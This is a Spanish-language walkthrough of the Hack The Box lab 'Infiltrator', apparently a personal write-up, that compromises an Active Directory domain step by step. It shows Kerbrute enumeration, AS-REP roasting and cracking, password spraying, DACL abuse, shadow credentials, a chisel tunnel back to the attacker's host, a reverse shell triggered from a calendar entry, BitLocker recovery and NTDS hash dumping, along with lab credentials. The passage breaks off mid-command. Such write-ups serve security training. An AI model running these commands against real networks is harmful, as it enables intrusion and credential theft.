2025-12-03T14:17:24 |_ssl-date: 2025-06-15T23:38:22+00:00; -3h45m50s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49691/tcp open msrpc Microsoft Windows RPC 49696/tcp open msrpc Microsoft Windows RPC 49727/tcp open msrpc Microsoft Windows RPC 49756/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-06-15T23:37:39 |_ start_date: N/A |_clock-skew: mean: -3h45m51s, deviation: 2s, median: -3h45m51s ``` SMB - Port 445 LDAP - Port 389 RPC - Port 135 Kerberos - Port 88 DNS - Port 53: ```zsh sudo echo \"10.10.11.31 infiltrator.htb dc01.infiltrator.htb\" | sudo tee -a /etc/hosts ``` - Web ![Image](image-2.png) ![Image](image-3.png) Team de 7 miembros relacionados con el sitio web: ``` davin anderson olivia martinez kevin turner amanda walker marcus harris lauren clark ethan rodriguez ``` Scan SubDomains ```zsh ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u \"http://infiltrator.htb/\" -H \"Host: FUZZ.infiltrator.htb\" -fs 31235 ``` Desafortunadamente no encontramos ninguna subdominio. Directory Brute Force ```zsh feroxbuster -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -u \"http://infiltrator.htb/\" -x html --dont-extract-links ``` ![Image](image-4.png) > Use la opcion --dont-extract-link para evitar el ruido (links irrelevantes) - SMBv1 - Port 445 Con smb podemos obtener mayor informacion del dominio. ```zsh nxc smb infiltrator.htb ``` ![Image](image-5.png) Como en este caso nos muestra la version del servidor `Server 2019 Build 17763 x64` ```zsh nxc smb infiltrator.htb --shares ``` El servicio smb esta habilitado pero necesitamos credenciales validas para listar los recursos compartidos. ![Image](image-6.png) ## Shell as M.Harris Con los 7 nombres que obtuvimos, podemos generar una lista de posibles nombres de usuario utilizando la herramienta **username-anarchy** - Username-Anarchy Generates different possible usernames [Github - username-anarchy](https://github.com/urbanadventurer/username-anarchy) ```zsh /opt/username-anarchy/username-anarchy -i users > usernames.txt ``` `head usernames.txt` ```r davin davinanderson davin.anderson davinand daviande davina d.anderson danderson adavin a.davin ... ``` ### Kerbrute Kerbrute para enumerar usuarios validos existentes en el dominio, es un ataque contra kerberos. ```zsh kerbrute userenum -d infiltrator.htb usernames.txt --dc infiltrator.htb ``` ![Image](image-7.png) Encontramos usuarios y al parecer se compone de la siguiente forma: {first inital name}.{last name} ```zsh nxc smb infiltrator.htb -u usersenum -p '' --shares ``` ![Image](image-8.png) ## KRB_AS_REP Roasting Identificar usuarios sin autenticación previa de Kerberos (UF_DONT_REQUIRE_PREAUTH). Esto permite solicitar un **TGT (Ticket Granting Ticket)** sin proporcionar credenciales previamente.. ```zsh /usr/share/doc/python3-impacket/examples/GetNPUsers.py infiltrator.htb/ -dc-ip 10.10.11.31 -usersfile usersenum ``` ![Image](image-9.png) >L. Clark tiene deshabilitada la autenticación previa de Kerberos y podemos obtener el hash AS-REP de **Kerberos 5 AS-REP hash (AES-256 or RC4)**. ### John The Ripper ```zsh john hash -w=/usr/share/wordlists/rockyou.txt ``` ```r WAT?watismypass! ($krb5asrep$23$l.clark@INFILTRATOR.HTB) ``` ![Image](image-10.png) ### Validate Password ```zsh nxc smb infiltrator.htb -u l.clark -p 'WAT?watismypass!' --shares ``` ![Image](image-11.png) Este usuarios si puede listar archivos compartidos dentro del dominio. ![Image](image-12.png) Intente validar la contraseña con evil-winrm pero no funciona, pero con rdp funciona ```zsh nxc rdp infiltrator.htb -u l.clark -p 'WAT?watismypass!' --shares ``` ![Image](image-13.png) ## Auth as D.Anderson ### User Enumeration Con esto podremos seguir enumerando mas usuarios dentro del dominio. ```zsh rpcclient -U 'l.clark%WAT?watismypass!' 10.10.11.31 -c 'enumdomusers' | grep -oP '\\[.*?\\]' | grep -v \"0x\" | tr -d '[]' ``` ```r D.anderson L.clark M.harris O.martinez A.walker K.turner E.rodriguez winrm_svc lan_managment ``` ```zsh rpcclient -U 'l.clark%WAT?watismypass!' 10.10.11.31 -c 'querydispinfo' ``` ![Image](image-15.png) K.Tuner tiene la contraseña en la descripcion de LDAP, pero no funciona para el usuario. ```r K.turner : MessengerApp@Pass! ``` ```zsh nxc smb infiltrator.htb -u 'K.turner' -p 'MessengerApp@Pass!' --shares ``` ```zsh SMB 10.10.11.31 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:infiltrator.htb) (signing:True) (SMBv1:False) SMB 10.10.11.31 445 DC01 [-] infiltrator.htb\\K.turner:MessengerApp@Pass! STATUS_LOGON_FAILURE ``` ### Password Sprying ```zsh netexec smb infiltrator.htb -u userslist -p passwords --continue-on-success ``` ![Image](image-16.png) `sudo ntpdate 10.10.11.31` ![Image](image-17.png) ```r D.anderson : WAT?watismypass! ``` - Usé el indicador -k para autenticarme con el controlador de dominio (DC) mediante tickets Kerberos en lugar de hacerlo directamente a través del servicio SMB. Esto resulta útil para eludir ciertas restricciones o políticas. Kerberos puede ignorar algunas restricciones (como LogonWorkstations) porque el DC valida el ticket. https://blog.whiteflag.io/blog/protected-users-you-thought-you-were-safe/ ```zsh nxc smb infiltrator.htb -u 'd.anderson' -p 'WAT?watismypass!' --shares -k ``` ![Image](image-18.png) Nada interesante en SMB ### BloodHound ```zsh bloodhound-python -d infiltrator.htb -u l.clark -p 'WAT?watismypass!' -ns 10.10.11.31 --zip -c All ``` ![Image](image-19.png) ![Image](image-20.png) ## Auth as E.Rodriguez D. Anderson tiene genericAll en Marketing Digital (OU). Una OU permite agrupar y administrar usuarios (y equipos, entre otros objetos) dentro de Active Directory. Permite a los administradores especificar que todos los usuarios de esta área específica deben tener estos permisos. [OUned.py Exploiting hidden Organizational Units ACL attack verctors in Active Directory](https://www.synacktiv.com/en/publications/ounedpy-exploiting-hidden-organizational-units-acl-attack-vectors-in-active-directory) - Modify OU ```zsh sudo /usr/share/doc/python3-impacket/examples/dacledit.py -action write -rights FullControl -inheritance -principal d.anderson -target-dn \"OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB\" 'infiltrator.htb/d.anderson:WAT?watismypass!' ``` ![Image](image-21.png) - Ticket with Kerberos ```zsh /usr/share/doc/python3-impacket/examples/getTGT.py 'infiltrator.htb/d.anderson:WAT?watismypass!' -dc-ip infiltrator.htb ``` ![Image](image-22.png) - **Kerberos Credential Cache(KRB5CCNAME)** ```zsh KRB5CCNAME=d.anderson.ccache /usr/share/doc/python3-impacket/examples/dacledit.py -action write -rights FullControl -inheritance -principal d.anderson -target-dn \"OU=MARKETING DIGITAL,DC=INFILTRATOR,DC=HTB\" 'infiltrator.htb/d.anderson' -k -no-pass -dc-ip infiltrator.htb ``` ![Image](image-23.png) ## Shadow Credential ```zsh KRB5CCNAME=d.anderson.ccache certipy-ad shadow auto -k -target dc01.infiltrator.htb -account e.rodriguez ``` ![Image](image-24.png) > tip: Necesita ejecutar el comando anterior y el actual para obtener el ccache y el hash nt. ```zsh KRB5CCNAME=e.rodriguez.ccache nxc smb infiltrator.htb --use-kcache ``` ![Image](image-25.png) Se utilizó el caché de credenciales para validar con netexec y funciono. ```zsh nxc smb infiltrator.htb -u 'r.rodriguez' -H 'b02e97f2fdb5c3d36f77375383449e56' ``` ![Image](image-26.png) ¡También con NT Hash para validar con netexec y funciona también! ## Auth as M.Harris ![Image](image-27.png) https://www.thehacker.recipes/ad/movement/dacl/addmember ### Add Memeber to Chiefs Marketing ```zsh bloodyAD --dc-ip \"10.10.11.31\" -d \"infiltrator.htb\" -u 'e.rodriguez' -p ':b02e97f2fdb5c3d36f77375383449e56' add groupMember \"CHIEFS MARKETING\" \"e.rodriguez\" ``` ![Image](image-28.png) Utilizamos el mismo comando con el ticket de kerberos. ```zsh KRB5CCNAME=e.rodriguez.ccache bloodyAD -u e.rodriguez -k --host dc01.infiltrator.htb -d infiltrator.htb add groupMember \"CHIEFS MARKETING\" e.rodriguez ``` ### Force Change Password M.Harris ![Image](image-29.png) ```zsh bloodyAD -u e.rodriguez -p ':b02e97f2fdb5c3d36f77375383449e56' --host dc01.infiltrator.htb -d infiltrator.htb set password m.harris 'P@ssword123!' ``` ![Image](image-30.png) ```zsh nxc winrm infiltrator.htb -u m.harris -p 'P@ssword123!' ``` -M.Harris tiene las mismas restricciones que D.Anderson ![Image](image-31.png) También con changepasswd.py de impackets podemos cambiar la contraseña. ```zsh /usr/share/doc/python3-impacket/examples/changepasswd.py infiltrator.htb/m.harris@dc01.infiltrator.htb -althash :b02e97f2fdb5c3d36f77375383449e56 -reset -dc-ip dc01.infiltrator.htb -newpass 'P@ssword123!' -altuser e.rodriguez ``` ![Image](image-32.png) - Get TGT ```zsh /usr/share/doc/python3-impacket/examples/getTGT.py 'infiltrator.htb/m.harris:P@ssword123!' -dc-ip infiltrator.htb Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type) ``` La contraseña cambia, pero al final aparece una advertencia que indica que las claves AES de Kerberos son incorrectas. El uso de Kerberos fallará con `KDC_ERR_ETYPE_NOSUPP`: ```zsh /usr/share/doc/python3-impacket/examples/changepasswd.py infiltrator.htb/m.harris@dc01.infiltrator.htb -althash :b02e97f2fdb5c3d36f77375383449e56 -reset -dc-ip dc01.infiltrator.htb -newpass 'P@ssword123!' -altuser e.rodriguez -p ldap ``` ![Image](image-33.png) - Utilicé el indicador ``-p ldap`` para forzar el uso del protocolo LDAP (en lugar de Kerberos) para cambiar la contraseña. ```zsh /usr/share/doc/python3-impacket/examples/getTGT.py 'infiltrator.htb/m.harris:P@ssword123!' -dc-ip infiltrator.htb ``` ![Image](image-34.png) - Nos conectamos a traves de winrm con el KRB5CCNAME. ```zsh KRB5CCNAME=m.harris.ccache evil-winrm -i dc01.infiltrator.htb -r infiltrator ``` ![Image](image-35.png) Aqui necesitamos configurar nuestro /etc/krb5.conf ```zsh [libdefaults] dns_lookup_kdc = false dns_lookup_realm = false default_realm = INFILTRATOR.HTB [realms] INFILTRATOR.HTB = { kdc = dc01.infiltrator.htb admin_server = dc01.infiltrator.htb default_domain = infiltrator.htb } [domain_realm] .infiltrator.htb = INFILTRATOR.HTB infiltrator.htb = INFILTRATOR.HTB ``` ![Image](image-36.png) ## Shell as WINRM_SVC - Enumeration ![Image](image-37.png) ``whoami /priv`` (No disponen de ningun privilegio interesante que podamos explotar) ![Image](image-38.png) - Programs ![Image](image-39.png) ```powershell $nets = netstat -ano | select-string LISTENING; foreach($n in $nets){ $p = $n -replace ' +',' '; $nar = $p.Split(' '); $pname = $(Get-Process -id $nar[-1]).ProcessName; $ppath = $(Get-Process -id $nar[-1]).Path; $n -replace \"$($nar[-1])\",\"$($ppath) $($pname)\" } ``` ```r TCP 0.0.0.0:80 0.0.0.0:0 LISTENING System TCP 0.0.0.0:88 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:135 0.0.0.0:0 LISTENING svchost TCP 0.0.0.0:389 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0: System System5 0.0.0.0:0 LISTENING System TCP 0.0.0.0:464 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:593 0.0.0.0:0 LISTENING svchost TCP 0.0.0.0:636 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING svchost TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING System TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING Microsoft.ActiveDirectory.WebServices TCP 0.0.0.0:14118 0.0.0.0:0 LISTENING OMServerService TCP 0.0.0.0:14119 0.0.0.0:0 LISTENING OMServerService TCP 0.0.0.0:14121 0.0.0.0:0 LISTENING OMServerService TCP 0.0.0.0:14122 0.0.0.0:0 LISTENING OMServerService TCP 0.0.0.0:1 System123 0.0.0.0:0 LISTENING System TCP 0.0.0.0:1 System125 0.0.0.0:0 LISTENING System TCP 0.0.0.0:14126 0.0.0.0:0 LISTENING outputmessenger_httpd TCP 0.0.0.0:14127 0.0.0.0:0 LISTENING OMServerService TCP 0.0.0.0:14128 0.0.0.0:0 LISTENING OMServerService TCP 0.0.0.0:14130 0.0.0.0:0 LISTENING OMServerService TCP 0.0.0.0:14406 0.0.0.0:0 LISTENING outputmessenger_mysqld TCP 0.0.0.0: System7001 0.0.0.0:0 LISTENING System TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING wininit TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING svchost TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING svchost TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING svchost TCP 0.0.0.0:49690 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:49691 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:49696 0.0.0.0:0 LISTENING lsass TCP 0.0.0.0:49717 0.0.0.0:0 LISTENING services TCP 0.0.0.0:49727 0.0.0.0:0 LISTENING dns TCP 0.0.0.0:49756 0.0.0.0:0 LISTENING certsrv TCP 0.0.0.0:49868 0.0.0.0:0 LISTENING dfsrs TCP 10.10.11.31:53 0.0.0.0:0 LISTENING dns TCP 10.10.11.31:139 0.0.0.0:0 LISTENING System TCP 10.10.11.31:15220 0.0.0.0:0 LISTENING OutputMessenger TCP 10.10.11.31:15230 0.0.0.0:0 LISTENING OutputMessenger TCP 127.0.0.1:53 0.0.0.0:0 LISTENING dns TCP [::]:80 [::]:0 LISTENING System TCP [::]:88 [::]:0 LISTENING lsass TCP [::]:135 [::]:0 LISTENING svchost TCP [::]: System System5 [::]:0 LISTENING System TCP [::]:464 [::]:0 LISTENING lsass TCP [::]:593 [::]:0 LISTENING svchost TCP [::]:3389 [::]:0 LISTENING svchost TCP [::]:5985 [::]:0 LISTENING System TCP [::]:9389 [::]:0 LISTENING Microsoft.ActiveDirectory.WebServices TCP [::]:14118 [::]:0 LISTENING OMServerService TCP [::]:14122 [::]:0 LISTENING OMServerService TCP [::]:1 System123 [::]:0 LISTENING System TCP [::]:1 System125 [::]:0 LISTENING System TCP [::]:14126 [::]:0 LISTENING outputmessenger_httpd TCP [::]:14127 [::]:0 LISTENING OMServerService TCP [::]:14128 [::]:0 LISTENING OMServerService TCP [::]:14130 [::]:0 LISTENING OMServerService TCP [::]:14406 [::]:0 LISTENING outputmessenger_mysqld TCP [::]: System7001 [::]:0 LISTENING System TCP [::]:49664 [::]:0 LISTENING wininit TCP [::]:49665 [::]:0 LISTENING svchost TCP [::]:49666 [::]:0 LISTENING svchost TCP [::]:49667 [::]:0 LISTENING lsass TCP [::]:49669 [::]:0 LISTENING svchost TCP [::]:49690 [::]:0 LISTENING lsass TCP [::]:49691 [::]:0 LISTENING lsass TCP [::]:49696 [::]:0 LISTENING lsass TCP [::]:49717 [::]:0 LISTENING services TCP [::]:49727 [::]:0 LISTENING dns TCP [::]:49756 [::]:0 LISTENING certsrv TCP [::]:49868 [::]:0 LISTENING dfsrs TCP [::1]:53 [::]:0 LISTENING dns ``` ![Image](image-40.png) ![Image](image-44.png) ![Image](image-45.png) ![Image](image-46.png) ``` 14123 - web 14125 - api 14127 File transfer 14128 File transfer 14130 File transfer 14406 DB - App ``` ### Port Forwarding `configuramos /etc/proxychains4.conf` ```zsh ./chisel server -p 8000 --reverse ``` ```powershell .\\chisel.exe client 10.10.14.2:8000 R:1080:socks ``` ### Output Messenger - TCP 14123 ![Image](image-47.png) ### Output Messenger - API 14125 ![Image](image-48.png) ### Output Messenger - 404 Page 14126 ![Image](image-50.png) ### Output Messegner ```r K.turner MessengerApp@Pass! ``` ![Image](image-49.png) The Dev_Chat hace mencion a \"our Output Wall\" ![Image](image-51.png) ![Image](image-52.png) ![Image](image-53.png) ### Output Wall Output Wall es un plugin de Output Messenger: Desafortunadamente, la aplicación no puede ejecutarse correctamente a través de un túnel SOCKS, por lo que debemos redireccionar cada puerto individualmente. Por lo tanto, usaré msfconsole para ejecutar el binario sin PowerShell, lo cual me funcionó. https://www.outputmessenger.com/lan-messenger-downloads/ ```powershell chisel.exe client 10.10.14.2:8000 R:14118:127.0.0.1:14118 R:14119:127.0.0.1:14119 R:14121:127.0.0.1:14121 R:14122:127.0.0.1:14122 R:14123:127.0.0.1:14123 R:14124:127.0.0.1:14124 R:14125:127.0.0.1:14125 R:14126:127.0.0.1:14126 R:14127:127.0.0.1:14127 R:14128:127.0.0.1:14128 R:14129:127.0.0.1:14129 R:14130:127.0.0.1:14130 R:14406:127.0.0.1:14406 ``` ![Image](image-54.png) Nos conectamos como K.Turner ![Image](image-55.png) Y funciono a la perfeccion. Nos muestra una interfaz muy similar al de la web con opciones adicionales: Sign In as K.Turner, it shows a similar interface web with additional options: ![Image](image-56.png) La App Wall tiene una publicacion ![Image](image-57.png) - UserExplorer conh credenciales. ![Image](image-58.png) - Validate Credentials ```zsh nxc smb infiltrator.htb -u 'm.harris' -p 'D3v3l0p3r_Pass@1337!' -k ``` ![Image](image-59.png) ```r m.harris D3v3l0p3r_Pass@1337! ``` ### Output Messenger as M.Harris ![Image](image-60.png) ### UserExplorer.exe Al ejecutarse en una máquina virtual de Windows, no se puede conectar a un servidor (lo cual tiene sentido ya que mi máquina virtual de Windows no está conectada a la VPN HTB en este momento): ![Image](image-61.png) - Reversing `UserExplorer.exe` con DotPeek. ![Image](image-62.png) ``LdapApp function` ```c internal class LdapApp { private static void Main(string[] args) { string path = \"LDAP://dc01.infiltrator.htb\"; string username = \"\"; string password = \"\"; string str1 = \"\"; string str2 = \"winrm_svc\"; string cipherText = \"TGlu22oo8GIHRkJBBpZ1nQ/x6l36MVj3Ukv4Hw86qGE=\"; ``` Podemos ver que la string ``cipherText`` esta en base64. ```c for (int index = 0; index -p -s [-default]\"); Console.WriteLine(\"To use the default credentials: UserExplorer.exe -default -s userToSearch\"); } } ``` - Decrypting Secret [CyberChef.io](https://cyberchef.io/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)AES_Decrypt(%7B'option':'UTF8','string':'b14ca5898a4e4133bbce2ea2315a1916'%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=VEdsdTIyb284R0lIUmtKQkJwWjFuUS94NmwzNk1WajNVa3Y0SHc4NnFHRT0) ![Image](image-63.png) decrypt again [CyberChef.io](https://cyberchef.io/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)AES_Decrypt(%7B'option':'UTF8','string':'b14ca5898a4e4133bbce2ea2315a1916'%7D,%7B'option':'Hex','string':'0000000000000000000000000000000'%7D,'CBC','Raw','Raw',%7B'option':'Hex','string':''%7D,%7B'option':'Hex','string':''%7D)&input=U0txd1FrODF0Z3ErQzNWN3B6YzFTQT09) ![Image](image-64.png) ```r WinRm@$svc^!^P ``` ### WinRm - Validate Credentials ![Image](image-65.png) ```zsh nxc winrm infiltrator.htb -u winrm_svc -p 'WinRm@$svc^!^P' ``` ![Image](image-66.png) ## Shell as O.Martinez - Output Messenger como winrm_svc ![Image](image-67.png) ```r lan_managment api key 558R501T5I6024Y8JV3B7KOUN1A518GG ``` ![Image](image-68.png) - Enumeration `whoami /groups` ![Image](image-69.png) Podemos ver un directorio Output Messenger que llama mucho la atencion en winrm_svc’s : ![Image](image-70.png) Ambos archivos son SQLite! ### DB Enumeration - OT.db3 `.tables` ``` m_chatroom om_drive_files om_preset_message om_chatroom_user om_escape_message om_reminder om_custom_group_new om_hide_usergroup om_settings om_custom_group_user_new om_notes om_user_master om_custom_status om_notes_user om_user_photo ``` ![Image](image-71.png) Hay algo de informacion, pero nada que nos interese. ### Output Messenger API Volvemos a la API Key desde outputmessenger como winrm_svc. https://support.outputmessenger.com/authentication-api/ ![Image](image-72.png) ![Image](image-73.png) ```zsh curl localhost:14125/api/users ``` ![Image](image-74.png) ```zsh curl -H \"API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG\" localhost:14125/api/users ``` ```r {\"rows\":[{\"user\":\"admin\",\"displayname\":\"Admin\",\"group\":\"Administration\",\"role\":\"A\",\"email\":\"\",\"phone\":\"\",\"title\":\"\",\"status\":\"online\"},{\"user\":\"D.anderson\",\"displayname\":\"D.anderson\",\"group\":\"Marketing Team\",\"role\":\"U\",\"email\":\"anderson@infiltrator.htb\",\"phone\":\"+0 123 443 699\",\"title\":\"Marketing\",\"status\":\"offline\"},{\"user\":\"L.clark\",\"displayname\":\"L.clark\",\"group\":\"Marketing Team\",\"role\":\"U\",\"email\":\"clark@infiltrator.htb\",\"phone\":\"+0 123 443 699\",\"title\":\"Marketing\",\"status\":\"offline\"},{\"user\":\"M.harris\",\"displayname\":\"M.harris\",\"group\":\"Developers\",\"role\":\"U\",\"email\":\"harris@infiltrator.htb\",\"phone\":\"+0 123 443 699\",\"title\":\"Developer\",\"status\":\"offline\"},{\"user\":\"O.martinez\",\"displayname\":\"O.martinez\",\"group\":\"Others\",\"role\":\"U\",\"email\":\"martinez@infiltrator.htb\",\"phone\":\"\",\"title\":\"Chief Marketing Officer\",\"status\":\"online\"},{\"user\":\"A.walker\",\"displayname\":\"A.walker\",\"group\":\"Others\",\"role\":\"U\",\"email\":\"walker@infiltrator.htb\",\"phone\":\"\",\"title\":\"Co Founder\",\"status\":\"offline\"},{\"user\":\"K.turner\",\"displayname\":\"K.turner\",\"group\":\"QA Testers\",\"role\":\"U\",\"email\":\"turner@infiltrator.htb\",\"phone\":\"\",\"title\":\"QA Tester\",\"status\":\"offline\"},{\"user\":\"E.rodriguez\",\"displayname\":\"E.rodriguez\",\"group\":\"Digital Influencer Marketing\",\"role\":\"U\",\"email\":\"rodriguez@infiltrator.htb\",\"phone\":\"+0 123 443 699\",\"title\":\"Digital Influencer\",\"status\":\"offline\"},{\"user\":\"winrm_svc\",\"displayname\":\"winrm_svc\",\"group\":\"Management and Security\",\"role\":\"U\",\"email\":\"winrm_svc@infiltrator.htb\",\"phone\":\"+0 123 443 699\",\"title\":\"Services Managment\",\"status\":\"online\"},{\"user\":\"Developer_01\",\"displayname\":\"Developer_01\",\"group\":\"Developers\",\"role\":\"U\",\"email\":\"Developer_01@infiltrator.htb\",\"phone\":\"\",\"title\":\"Developer\",\"status\":\"offline\"},{\"user\":\"Developer_02\",\"displayname\":\"Developer_02\",\"group\":\"Developers\",\"role\":\"U\",\"email\":\"Developer_02@infiltrator.htb\",\"phone\":\"\",\"title\":\"Developer_02\",\"status\":\"offline\"},{\"user\":\"Developer_03\",\"displayname\":\"Developer_03\",\"group\":\"Developers\",\"role\":\"U\",\"email\":\"Developer_03@infiltrator.htb\",\"phone\":\"\",\"title\":\"Developer_03\",\"status\":\"offline\"}],\"success\":true} ``` https://support.outputmessenger.com/chat-room-api/ - ChatRooms ```zsh curl -H \"API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG\" localhost:14125/api/chatrooms -s | jq ``` ```json \"rows\": [ { \"room\": \"Chiefs_Marketing_chat\", \"roomusers\": \"O.martinez|0,A.walker|0\" }, { \"room\": \"Dev_Chat\", \"roomusers\": \"Admin|0,M.harris|0,K.turner|0,Developer_01|0,Developer_02|0,Developer_03|0\" }, { \"room\": \"General_chat\", \"roomusers\": \"Admin|0,D.anderson|0,L.clark|0,M.harris|0,O.martinez|0,A.walker|0,K.turner|0,E.rodriguez|0,winrm_svc|0,Developer_01|0,Developer_02|0,Developer_03|0\" }, { \"room\": \"Marketing_Team_chat\", \"roomusers\": \"D.anderson|0,L.clark|0\" } ], \"success\": true } ``` - Recuperar un registro de una sala de chat. ```zsh curl -H \"API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG\" localhost:14125/api/chatrooms/logs?=20240220014618@conference.com -s | jq ``` ![Image](image-75.png) (picking an arbitrary time range) ```zsh curl -H \"API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG\" 'localhost:14125/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2023/03/12&todate=2024/09/24' -s | jq ``` Nos generará un montón de datos html, pero en la última línea de la parte inferior podemos ver las credenciales. ![Image](image-76.png) Podemos guardar los logs en un archivo ```zsh curl -H \"API-KEY: 558R501T5I6024Y8JV3B7KOUN1A518GG\" 'localhost:14125/api/chatrooms/logs?roomkey=20240220014618@conference.com&fromdate=2023/03/12&todate=2024/09/24' -s | jq .logs -r > Chiefs-marketing-chat.html ``` ![Image](image-77.png) ```r O.martinez m@rtinez@1996! ``` ### Output Messenger Con las credenciales que tenemos, no son validas. ![Image](image-78.png) Tambien no hay nada nuevo en los chats como O.Martínez que no haya visto ya. ### Calendar Execution - Enumeration ![Image](image-79.png) - PoC with Ping ```zsh echo 'ping -n 1 10.10.14.2' > ping_test.bat ``` Subimos el archivo a infiltrator en la ruta: `C:\\ProgramData\\ping_test.bat` ![Image](image-80.png) In kali: ```zsh sudo tcpdump -ni tun0 icmp ``` Validamos que funciona ![Image](image-81.png) ![Image](image-82.png) Ahora creamos otro archivo en la máquina windows en la misma ruta `C:\\ProgramData\\ping_test.bat` ![Image](image-83.png) ![Image](image-84.png) Y obténemos el mismo resultado de 10.10.11.31(Infiltrador) ![Image](image-85.png) ### Shell as O.Martinez Nosotros vamos a hacer el mismo proceso con una carcasa inversa. ![Image](image-86.png) Works likes impersonation, the file rev.bat on my windows vm supposed to be the file in the Funciona como suplantación, se supone que el archivo rev.bat en mi máquina virtual de Windows es el archivo en la máquina infiltrator y ese es el que se ejecuta (archivo en infiltrator). ## Shell as Lan_mangment Siguiendo la misma enumeración antes de encontrar el archivo pcapng ![Image](image-87.png) Para descargarlo, yo copie el archivo a ProgramData, ahi comumente hay permisos de escritura. ```zsh Move-Item -Path \"C:\\Users\\O.martinez\\AppData\\Roaming\\Output Messenger\\FAAA\\Received Files\\203301\\network_capture_2024.pcapng\" -Destination \"C:\\ProgramData\\network_capture_2024.pcapng\" -Force ``` ![Image](image-88.png) Cuando descargo el archivo en Linux, aparece que tiene 0 bytes, lo cual es un problema con los permisos. ![Image](image-89.png) ```powershell Get-Acl -Path \"C:\\temp\\network_capture_2024.pcapng\" | Format-List ``` ![Image](image-90.png) Podemos modificar los permisos. ```powershell $acl = Get-Acl -Path \"C:\\temp\\network_capture_2024.pcapng\" $perm = \"winrm_svc\", \"FullControl\", \"Allow\" $rule = New-Object System.Security.AccessControl.FileSystemAccessRule($perm) $acl.SetAccessRule($rule) $acl | Set-Acl -Path \"C:\\temp\\network_capture_2024.pcapng\" ``` ```powershell Get-Acl -Path \"C:\\temp\\network_capture_2024.pcapng\" | Format-List ``` ![Image](image-91.png) Ahora podemos decargar el archivo via winrm ![Image](image-92.png) ### Network_capture_2024.pcapng #### WireShark Statistics -> Conversations -> TCP ![Image](image-93.png) Muestra que 192.168.128.232 es el host donde se realiza la recopilación. También hay tráfico HTTP(S) y varias conexiones a TCP 5000 en otro host con una IP privada, 192.168.1.106. - Flask - File Hosting ![Image](image-94.png) `authorization=securepassword` ![Image](image-95.png) `location: /files` ![Image](image-96.png) ![Image](image-97.png) ![Image](image-98.png) File -> Export Objects -> HTTP ![Image](image-99.png) Lo guardaré en BitLocker-backup.7z de mi host. ![Image](image-100.png) Hay un POST en /api/change_auth_token, con una nueva contraseña establecida en el encabezado. ![Image](image-101.png) ```zsh O.martinez M@rtinez_P@ssw0rd! ``` ![Image](image-102.png) Parece no funcionar con WinRM pero en RDP funciona. ![Image](image-103.png) ### BitLocker-backup.7z #### Get Access ``` 7z x BitLcoker-backup.7z ``` ![Image](image-104.png) El output va hacia un archivo debido que es muy largo, aparte que es mas comodo y rapido. ```zsh 7z2john BitLocker-backup.7z | tee BitLocker-backup.7z.hash > hash2john ``` ### HashCat ```zsh hashcat hash2john --user /usr/share/wordlists/rockyou.txt ``` ![Image](image-105.png) ![Image](image-106.png) - Recovery Key ``` 650540-413611-429792-307362-466070-397617-148445-087043 ``` ### RDP - Connect ```zsh xfreerdp3 /u:o.martinez /p:'M@rtinez_P@ssw0rd!' /v:10.10.11.31 /d:dc01.infiltrator.httb ``` - Access E: Hay una unidad `E:` que está bloqueada. ![Image](image-107.png) Usamos el Recovery Key que encontramos anteriormente en la web. ![Image](image-108.png) ```powershell Compress-Archive -Path 'E:\\Windows Server 2012 R2 - Backups\\' -DestinationPath C:\\temp\\Ee.zip ``` ![Image](image-109.png) Movemos a c:\\temp para descargar con evil-winrm como winrm_svc `7z x Backup_Credentials.7z` ![Image](image-110.png) ![Image](image-111.png) NTDS.DIT es una base de datos de AD (Active Directory). Contiene toda la información crítica del dominio, incluyendo credenciales, usuarios, grupos y políticas. ### Backup Passwords - Dump Hashes ```zsh secretsdump.py -security registry/SECURITY -system registry/SYSTEM -ntds Active\\ Directory/ntds.dit LOCAL ``` ![Image](image-112.png) Guardaré las credenciales ntlm y las usaré para crear un archivo de usuario y un archivo de contraseñas: ```zsh cat ntlm | cut -d: -f1 > users cat ntlm | cut -d: -f2-4 > passwords ``` Pero ningún hash funciono para ningún usuario. ![Image](image-113.png) #### NTDS Enumeration [Github - ntdsdotsqlite](https://github.com/almandin/ntdsdotsqlite) ```zsh ntdsdotsqlite Active\\ Directory/ntds.dit --system registry/SYSTEM -o ntds.sqlite ``` ![Image](image-114.png) ![Image](image-115.png) `select commonname,description from 